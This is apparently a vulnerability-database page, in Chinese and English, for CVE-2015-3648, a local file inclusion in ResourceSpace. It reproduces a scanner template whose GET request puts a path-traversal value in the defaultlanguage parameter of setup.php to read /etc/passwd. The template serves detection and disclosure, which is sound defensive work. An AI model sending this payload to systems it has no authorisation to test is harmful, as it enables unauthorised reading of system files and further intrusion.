CVE-2015-3648: ResourceSpace - Local File inclusion

日期: 2025-08-01 | 影响软件: ResourceSpace | POC: 已公开

漏洞描述

ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.

PoC代码[已公开]

id: CVE-2015-3648

info:
  name: ResourceSpace - Local File inclusion
  author: pikpikcu
  severity: high
  description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability.
  reference:
    - https://vulners.com/cve/CVE-2015-3648/
    - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738
    - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3648
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2015-3648
    cwe-id: CWE-22
    epss-score: 0.45832
    epss-percentile: 0.97552
    cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: montala
    product: resourcespace
  tags: cve2015,cve,lfi,resourcespace,packetstorm,montala

http:
  - method: GET
    path:
      - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220312f0b49625aa19ce0774f2e6e7964e004a60a84771b8ca476e2554c4300832e022100a448c78c9c46fdc1ca5cccc25f55f6108c362b59b2863ba232040691c712a116:922c64590222798bb761d5b6d8e72950

相关漏洞推荐